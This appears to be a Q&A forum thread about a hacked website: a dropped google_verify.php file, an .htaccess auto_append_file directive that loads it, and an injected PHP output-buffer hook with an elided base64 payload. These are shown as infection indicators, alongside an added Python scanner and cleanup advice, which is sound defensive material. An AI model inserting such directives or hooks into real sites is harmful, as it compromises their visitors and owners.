
virus problem google_verify.php and ftp passwords

A couple of days ago I had problems with my sites. On all FTP servers I got some PHP file called google_verify.php, and in my .htaccess file the following text was added:

<IfModule mod_php5.c>
php_value auto_append_file "google_verify.php"
</IfModule>

<IfModule mod_php4.c>
php_value auto_append_file "google_verify.php"
</IfModule>

Here is google_verify.php file:


I suspect that my PC is infected with some kind of virus that can read my FTP access parameters from my FTP manager.

Does anybody know something more about this virus and how I can clean my computer?

Thanks in advance

kukipei asked Jul 13 '11 22:07


2 Answers

I am no security specialist but one of my sites got the same file. From my limited knowledge and research what happened is that your site got hacked and the google_verify.php file is part of an injection attack.

You should also check other files of your website (especially the index.php/htm/html) and look for:

     ob_start("security_update"); function security_update($buffer){return $buffer.base64_decode('...');}

It seems that this virus/malware is affecting several CMS such as Joomla, Wordpress, CodeIgniter, etc. Some more info here and here.

obaqueiro answered Oct 24 '22 02:10
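A scanner for the indicators named in this thread (the google_verify.php file, the auto_append_file line in .htaccess, and the ob_start("security_update") hook), added here as an example and not code from either poster. It also flags auto_prepend_file, which goes beyond the thread; the names scan_tree and demo and the sample tree are constructed for illustration.

```python
import os
import re
import tempfile

DROPPED_NAME = "google_verify.php"          # file name reported in the question
HTACCESS_RE = re.compile(                   # directive reported in the question
    r'^\s*php_value\s+auto_(append|prepend)_file\s+"?([^"\s]+)"?', re.I | re.M)
HOOK_RE = re.compile(                       # snippet reported in the first answer
    r'ob_start\(\s*["\']security_update["\']\s*\)|function\s+security_update\s*\(')
WEB_EXT = (".php", ".htm", ".html")

def scan_tree(root):
    """Return sorted (relative_path, finding) pairs for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower() == DROPPED_NAME:
                findings.append((rel, "dropped file"))
                continue
            if name != ".htaccess" and not name.lower().endswith(WEB_EXT):
                continue
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                for m in HTACCESS_RE.finditer(text):
                    findings.append(
                        (rel, f"auto_{m.group(1).lower()}_file -> {m.group(2)}"))
            elif HOOK_RE.search(text):
                findings.append((rel, "security_update output-buffer hook"))
    return sorted(findings)

def demo():
    """Write a small constructed site tree to a temp dir and scan it."""
    samples = {  # constructed sample files, not taken from a real site
        ".htaccess": '<IfModule mod_php5.c>\n'
                     'php_value auto_append_file "google_verify.php"\n</IfModule>\n',
        "google_verify.php": "<?php /* constructed placeholder */\n",
        "index.php": '<?php ob_start("security_update"); ?>\n',
        "about.html": "<p>clean page</p>\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for rel, finding in demo():
        print(f"{rel}: {finding}")
```

Point scan_tree at a local mirror of the document root; a hit in .htaccess names the file being appended to every page, so both the directive and that file need removing.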


Best course of action:

  • change ALL ftp and username passwords QUICKLY
  • uninstall all FTP program(s) on your pc
  • run virus scan & malware scan
  • make sure your pc is clean
  • reinstall FTP client (clean install - download new version of software)

Now, to clean your WP website:

  • install WP plugins (tac, exploit scanner)
  • run plugins
  • note infected files
  • use FTP or WP plugin editor to clean these files
  • run exploit scanner & tac till website is clean

Hope this helps...

Bobby answered Oct 24 '22 04:10


